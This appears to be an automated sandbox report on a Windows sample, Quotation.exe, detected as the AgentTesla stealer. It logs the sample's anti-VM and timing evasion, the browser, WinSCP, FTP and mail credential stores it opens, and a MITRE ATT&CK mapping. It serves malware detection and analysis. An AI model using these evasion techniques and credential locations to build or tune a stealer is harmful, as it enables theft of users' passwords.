Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Quotation.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Quotation.exe	API/Special instruction interceptor: Address: 99FC0D0
Source: C:\Users\user\Desktop\Quotation.exe	API/Special instruction interceptor: Address: 66BC0D0

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Quotation.exe	RDTSC instruction interceptor: First address: 99AA5FB second address: 99AA5FB instructions: 0x00000000 rdtsc 0x00000002 test bl, FFFFFFEAh 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F124CD8D972h 0x00000009 test al, al 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d cmp dx, bx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Quotation.exe	RDTSC instruction interceptor: First address: 666A5FB second address: 666A5FB instructions: 0x00000000 rdtsc 0x00000002 test bl, FFFFFFEAh 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F124CD73012h 0x00000009 test al, al 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d cmp dx, bx 0x00000010 rdtsc

Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 38110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 37FB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199874	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199764	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199656	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199546	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199435	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199328	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199218	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199106	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198999	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198890	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198781	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198671	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198562	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198453	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198343	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198234	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198124	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198014	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1197906	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1197796	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Window / User API: threadDelayed 7727			Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Window / User API: threadDelayed 2129			Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Quotation.exe

Evaded block: after key decision

graph_0-3128

Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6108	Thread sleep count: 7727 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6108	Thread sleep count: 2129 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -99546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -98891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -98672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -98344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -98016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -97906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -97797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -97687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -97569s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -97344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -97219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -97109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -97000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -96887s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1199874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1199764s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1199656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1199546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1199435s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1199328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1199218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1199106s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1198999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1198890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1198781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1198671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1198562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1198453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1198343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1198234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1198124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1198014s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1197906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2144	Thread sleep time: -1197796s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quotation.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Quotation.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004066F7
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004065AD FindFirstFileW,FindClose,		0_2_004065AD

Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98891	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98344	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98125	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98016	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97906	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97797	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97687	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97569	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97344	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97219	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97109	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96887	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199874	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199764	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199656	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199546	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199435	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199328	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199218	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199106	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198999	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198890	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198781	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198671	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198562	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198453	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198343	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198234	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198124	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198014	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1197906	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1197796	Jump to behavior

Source: Quotation.exe, 00000004.00000002.2930496341.000000000794D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7
Source: Quotation.exe, 00000004.00000002.2930496341.00000000078F8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000002.2930496341.000000000794D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Quotation.exe

API call chain: ExitProcess graph end node

graph_0-3014

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 0_2_6FC92351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FC92351

Source: C:\Users\user\Desktop\Quotation.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Users\user\Desktop\Quotation.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

0_2_004036DA

Source: C:\Users\user\Desktop\Quotation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.2951221358.0000000038161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2951221358.000000003818C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2951221358.0000000038194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 8048, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Quotation.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000004.00000002.2951221358.0000000038161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 8048, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.2951221358.0000000038161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2951221358.000000003818C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2951221358.0000000038194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 8048, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Obfuscated Files or Information	11 Input Capture	225 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	1 DLL Side-Loading	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	311 Security Software Discovery	Distributed Component Object Model	11 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
